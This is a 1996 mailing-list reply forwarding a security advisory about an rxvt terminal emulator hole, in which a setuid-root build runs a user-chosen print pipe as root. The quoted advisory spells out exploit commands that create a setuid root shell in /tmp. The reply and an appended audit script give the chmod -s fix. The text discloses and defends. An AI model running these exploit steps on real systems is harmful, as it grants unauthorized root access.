
Re: [Fwd: SECURITY: rxvt security hole]



I think it's fair to release a fix with such a thing.

The fix is:

# find / -name rxvt -print
/usr/X11/bin/rxvt
/other/possible/locations/rxvt
# chmod -s /usr/X11/bin/rxvt
# chmod -s /other/possible/location/rxvt
# ....

This will have one negative effect: if a user opens several rxvts, you 
will not see him logged in more than once.

On Fri, 12 Jan 1996, Gilad Gam wrote:

> Hi,
> 
> This one is a REAL alert, try it and you get root in 30 seconds...
> 
> Gilad.
> 
> 
> David J Meltzer wrote:
> > 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > [This was recently forwarded over the linux-alert mailing list.  I left
> > the full text of the exploit in this post due to the fact that it is
> > already quite well publicized.  I have not verified the exploit code
> > myself.  --Jeff.]
> > 
> >    There is a major security hole in rxvt, a terminal emulator for X, when it
> > is run on systems suid root, as is required on many configurations in order to
> > write to the utmp file.  It is obvious from the code that this program was
> > not written to be run suid root, it's a pity that sysadmins that install the
> > compiled versions of this sort of code don't see the same warnings of 'run
> > suid root at your own risk' that the people that put together a distribution
> > with it that way see in the makefile.
> >    The conditions that allow this particular hole to be exploited are rxvt
> > compiled with the PRINT_PIPE option, and running suid root.  The program
> > sets the pipe to "lpr", without a pathname, but it's even easier than that
> > to exploit because we can set the pipe to whatever we want with the -print-pipe
> > option on the rxvt command line.  Although the program gives up its root
> > privileges when forking to run a shell or other command, the original program
> > continues running suid root the entire execution of the program.
> >    Because the popen() call runs as root, whatever program that pipe opens
> > will execute immediately as root.  In order to start the printer pipe, the
> > vt100 printer-on command is ESC[5i.  The pipe can then be closed with the
> > printer-off command, ESC[4i.  Exploiting this is extremely easy.
> > 
> >                    Program: rxvt
> > Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
> >                             rxvt suid root (and compiled with PRINT_PIPE)
> >               Requirements: account on system, X server
> >            Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
> >        Security Compromise: root
> >                     Author: Dave M. (davem@cmu.edu)
> >                   Synopsis: rxvt fails to give up root privileges before
> >                             opening a pipe to a program that can be specified
> >                             by the user.
> > 
> > Exploit:
> > 1.  Set DISPLAY environment variable if necessary so you can use x clients.
> > 2.  In user shell:
> >     $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
> >     $ chmod +x /tmp/rxbug
> >     $ rxvt -print-pipe /tmp/rxbug
> > 3.  In rxvt xclient:
> >     $ cat
> >       ESC[5i
> >       ESC[4i
> >     (The client will close at this point with a broken pipe)
> > 4.  $ /tmp/rxsh
> >     # whoami
> >     root
> >     #
> > 
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
> > 
> > iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> > r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> > ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> > r16NALs+Zwo=
> > =BzNN
> > -----END PGP SIGNATURE-----
> > 
> > ------------------------------------------------------------------------
> > The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> > were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> > have their implicit approval for security announcements, by prior
> > arrangement.
> > ------------------------------------------------------------------------
> 

--------------------------------------------- ....- --.. ----. -.. --. .
            Arik Baratz, Regularus Studentus, iNTP, 4Z9DGE
---------------------------------------------------------------------------

  "Your conscious mind is very intelligent, and your unconscious mind
     is a hell of a lot smarter than you are."
                                                 - Erickson H. Milton
http://ccarik.technion.ac.il/~arikb
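The reply above gives the fix as a manual find-then-chmod session. The script below is an added example (not code from the original post or from the rxvt project) that automates the same mitigation: it locates every setuid file named rxvt under the given roots, reports them, and in "fix" mode strips the setuid bit and verifies the bit is gone. The search roots and the report/fix mode names are assumptions made for this example; the utmp side effect the reply mentions still applies once the bit is removed.

```shell
#!/bin/sh
# Added example, not part of the original post: audit for setuid rxvt
# binaries and optionally apply the "chmod -s" fix the reply describes.
# Run as root on a real system; any user can try it in a scratch directory.

# list_suid_rxvt ROOT...: print every regular file named rxvt under the
# given roots that has the setuid bit set.  "-perm -4000" matches files
# whose mode includes u+s; "-xdev" keeps find on the starting filesystem.
list_suid_rxvt() {
    find "$@" -xdev -type f -name rxvt -perm -4000 -print 2>/dev/null
}

# strip_suid FILE: remove the setuid bit (the reply's "chmod -s") and
# confirm it is really gone.  Returns non-zero on failure.
strip_suid() {
    chmod u-s "$1" || return 1
    # "-u" tests whether the setuid bit is still present
    if [ -u "$1" ]; then
        return 1
    fi
    return 0
}

# audit_rxvt MODE ROOT...: MODE is "report" (default) or "fix".
# Prints one line per affected binary: "setuid PATH" in report mode,
# "fixed PATH" or "FAILED PATH" in fix mode.
audit_rxvt() {
    mode=$1
    shift
    list_suid_rxvt "$@" | while IFS= read -r path; do
        case $mode in
            fix)
                if strip_suid "$path"; then
                    echo "fixed $path"
                else
                    echo "FAILED $path"
                fi
                ;;
            *)
                echo "setuid $path"
                ;;
        esac
    done
}

# Stand-alone usage: sh audit_rxvt.sh [report|fix] ROOT...
# Example (assumed paths, as in the reply): sh audit_rxvt.sh report /usr/X11 /usr/X11R6
if [ "$#" -gt 0 ]; then
    audit_rxvt "$@"
fi
```

Report mode is safe to run first so the list of affected binaries can be reviewed before anything is changed; fix mode re-checks each file with `[ -u ]` after chmod so a filesystem that silently refused the change shows up as FAILED rather than as a false "fixed".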